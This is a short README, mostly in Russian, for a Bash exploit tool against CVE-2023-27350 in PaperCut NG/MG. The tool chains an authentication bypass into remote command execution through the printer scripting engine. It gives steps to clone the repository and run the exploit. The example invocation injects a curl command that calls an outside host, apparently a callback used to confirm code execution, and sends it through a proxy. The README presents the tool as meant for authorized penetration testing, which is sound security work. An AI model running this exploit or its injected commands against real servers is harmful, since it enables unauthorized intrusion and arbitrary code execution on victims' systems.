
Инструмент эксплуатации обхода аутентификации и удаленного выполнения кода (RCE) в PaperCut NG/MG. Автономная реализация цепочки эксплойтов PaperCut на Bash с опциональной поддержкой прокси, автоматизированным повышением привилегий сеанса и динамической инъекцией команд через движок сценариев печати. Разработан для аудита безопасности и авторизованного тестирования на проникновение.

Упрощённый эксплойт на Bash для CVE-2023-27350. Этот скрипт автоматизирует обход аутентификации, подготовку окружения и внедрение команд через механизм сценариев принтера PaperCut.


# Clone the repository
git clone https://github.com/dezso-dfield/CVE-2023-27350.git
# Enter the directory
cd CVE-2023-27350
# Make the script executable
chmod +x rce.sh
# Run the exploit (Example with Proxy)
./rce.sh -u http://10.129.238.16:9191 -x http://10.129.238.16:3128 -c "curl http://10.10.15.82:8000/rce"
-u : URL цели (например, http://10.129.x.x:9191)-c : Команда для выполнения (в кавычках)-x : (Необязательно) URL прокси (например, http://10.129.x.x:3128)